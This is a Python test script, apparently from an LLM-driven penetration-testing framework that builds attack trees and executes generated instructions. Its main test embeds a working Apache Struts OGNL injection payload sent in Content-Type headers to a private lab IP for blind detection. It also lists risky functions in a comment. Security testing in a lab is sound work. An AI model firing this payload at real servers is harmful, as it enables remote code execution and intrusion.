You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 

140 lines
5.1 KiB

import re
import subprocess
import tempfile
import os
import pexpect
import struct
import sys
import mysql.connector
import requests
from mycode.LLMManager import LLMManager
from mycode.TaskObject import TaskObject
from myutils.PickleManager import g_PKM
from mycode.InstructionManager import g_instrM
from mycode.TaskManager import g_TaskM
from mycode.PythonTManager import PythonTManager
from myutils.ConfigManager import myCongif
import textwrap
class Mytest:
def update_node_inter(self,attack_index):
attack_tree = g_PKM.ReadData(attack_index)
nodes = attack_tree.traverse_dfs()
# 06-0=>p
instr = nodes[6].get_instr_user().pop(0)
nodes[6].parent.get_instr_user().append(instr)
# 39-1
instr = nodes[39].get_instr_user().pop(1)
nodes[39].parent.get_instr_user().append(instr)
# 49-0
instr = nodes[49].get_instr_user().pop(0)
nodes[49].parent.get_instr_user().append(instr)
g_PKM.WriteData(attack_tree, attack_index)
if __name__ == "__main__":
# 示例使用
mytest = Mytest()
LLM = LLMManager(1)
PythonM = PythonTManager(myCongif.get_data("Python_max_procs"))
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 16
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip",None)
if test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
str_instr = '''python-code
import requests
def dynamic_fun():
# 基于布尔条件的盲注检测
true_condition = "'test'=='test'"
false_condition = "'test'=='wrong'"
payload_template = (
"%{(#_='multipart/form-data')."
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
"(#_memberAccess?(#_memberAccess=#dm):"
"((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#ognlUtil.getExcludedPackageNames().clear())"
".(#ognlUtil.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))."
f"(#result=@java.lang.Boolean@parseBoolean({{}}))}}"
)
try:
# 发送真条件请求
true_payload = payload_template.format(true_condition)
r_true = requests.get(
'http://192.168.204.137',
headers={'Content-Type': true_payload},
timeout=10
)
# 发送假条件请求
false_payload = payload_template.format(false_condition)
r_false = requests.get(
'http://192.168.204.137',
headers={'Content-Type': false_payload},
timeout=10
)
# 对比响应差异
if r_true.status_code != r_false.status_code:
return (True, f'Different status codes detected (True: {r_true.status_code} vs False: {r_false.status_code})')
if len(r_true.content) != len(r_false.content):
return (True, f'Content length difference detected (True: {len(r_true.content)} vs False: {len(r_false.content)})')
return (False, 'No observable differences between true/false conditions')
except Exception as e:
return (False, f'Request failed: {str(e)}')
'''
#str_instr = str_instr.strip() + " --max-time 10"
dedented_code = textwrap.dedent(str_instr.strip())
#对多shell指令的情况进行处理--也有风险
if "python-code" not in dedented_code:
if "&&" in dedented_code:
dedented_code = task_Object.mill_instr_preprocess(dedented_code, "&&")
elif "||" in dedented_code:
dedented_code = task_Object.mill_instr_preprocess(dedented_code, "||")
instr, reslut, source_result, ext_params = g_instrM.execute_instruction(dedented_code)
else:
instr, reslut, source_result, ext_params = PythonM.execute_instruction(dedented_code)
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
cur_node = nodes[78]
commands = [
]
for cmd in commands:
cur_node.add_instr(cmd)
cur_node.update_work_status(1)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
elif test_type ==3: #按格式读取指令
pass
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("6")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
testnode = TreeNode("test", 0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.messages[0]["content"]
# print(systems)
# 遍历node,查看有instr的ndoe
nodes = attact_tree.traverse_bfs()
for node in nodes:
node.messages[0]["content"] = systems
g_PKM.WriteData(attact_tree, "6")
print("完成Messgae更新")
else:
pass